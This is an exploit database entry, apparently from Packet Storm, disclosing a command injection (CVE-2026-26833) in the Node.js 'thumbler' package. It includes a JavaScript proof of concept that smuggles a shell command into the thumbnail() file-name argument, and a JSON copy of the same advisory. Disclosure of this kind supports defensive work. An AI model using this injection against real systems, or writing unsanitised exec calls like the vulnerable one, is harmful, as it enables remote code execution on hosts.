📄 thumbler 1.1.2 Command Injection_PACKETSTORM:219864

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

The thumbler package through version 1.1.2 contains a critical command injection vulnerability in the thumbnail function. User-supplied input parameters input, output, time, size are concatenated into a single ffmpeg command string and executed via...

Visit Original Source

Basic Information

ID PACKETSTORM:219864

Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : thumbler ≤ 1.1.2 Command Injection in thumbnail() Leading to Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/mmahrous/thumbler |
==================================================================================================================================

[+] Summary : The thumbler package (through version 1.1.2) contains a critical command injection vulnerability in the thumbnail() function.
User-supplied input parameters (input, output, time, size) are concatenated into a single ffmpeg command string and executed via child_process.exec() without proper sanitization.
An attacker can inject arbitrary shell commands by crafting malicious input, leading to remote code execution (RCE) on the host system with the privileges of the Node.js process.

[+] POC :

// exploit.js

const thumbler = require("thumbler");

const maliciousCommand = "id > /tmp/pwned.txt";

const maliciousInput = `test.mp4"; ${maliciousCommand}; echo "`;

const outputPath = "/tmp/output.jpg";
const options = {
time: 5,
size: "100x100"
};

console.log("[+] Executing command injection via thumbler CVE-2026-26833");
console.log("[+] Malicious input:", maliciousInput);

thumbler.thumbnail(maliciousInput, outputPath, options, (err, stdout, stderr) => {
if (err) {
console.log("[!] Thumbnail generation failed (but command may have executed)");
console.log("Error:", err.message);
} else {
console.log("[+] Thumbnail generated (injection might still work)");
}

console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
});

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-27T16:31:41",
    "description": "The thumbler package through version 1.1.2 contains a critical command injection vulnerability in the thumbnail function. User-supplied input parameters input, output, time, size are concatenated into a single ffmpeg command string and executed via...",
    "published": "2026-04-27T00:00:00",
    "modified": "2026-04-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 thumbler 1.1.2 Command Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219864",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-26833"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : thumbler \u2264 1.1.2 Command Injection in thumbnail() Leading to Remote Code Execution                               |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/mmahrous/thumbler                                                                             |\n    ==================================================================================================================================\n    \n    [+] Summary    : The thumbler package (through version 1.1.2) contains a critical command injection vulnerability in the thumbnail() function. \n                     User-supplied input parameters (input, output, time, size) are concatenated into a single ffmpeg command string and executed via child_process.exec() without proper sanitization.\n                     An attacker can inject arbitrary shell commands by crafting malicious input, leading to remote code execution (RCE) on the host system with the privileges of the Node.js process.\n    \n    \n    [+] POC        :  \n    \n    // exploit.js\n    \n    const thumbler = require(\"thumbler\");\n    \n    \n    const maliciousCommand = \"id > /tmp/pwned.txt\"; \n    \n    \n    const maliciousInput = `test.mp4\"; ${maliciousCommand}; echo \"`;\n    \n    const outputPath = \"/tmp/output.jpg\";\n    const options = {\n        time: 5,\n        size: \"100x100\"\n    };\n    \n    console.log(\"[+] Executing command injection via thumbler CVE-2026-26833\");\n    console.log(\"[+] Malicious input:\", maliciousInput);\n    \n    thumbler.thumbnail(maliciousInput, outputPath, options, (err, stdout, stderr) => {\n        if (err) {\n            console.log(\"[!] Thumbnail generation failed (but command may have executed)\");\n            console.log(\"Error:\", err.message);\n        } else {\n            console.log(\"[+] Thumbnail generated (injection might still work)\");\n        }\n    \n        console.log(\"[*] Check if the command executed by running: cat /tmp/pwned.txt\");\n    });\n    \t\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219864",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219864/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply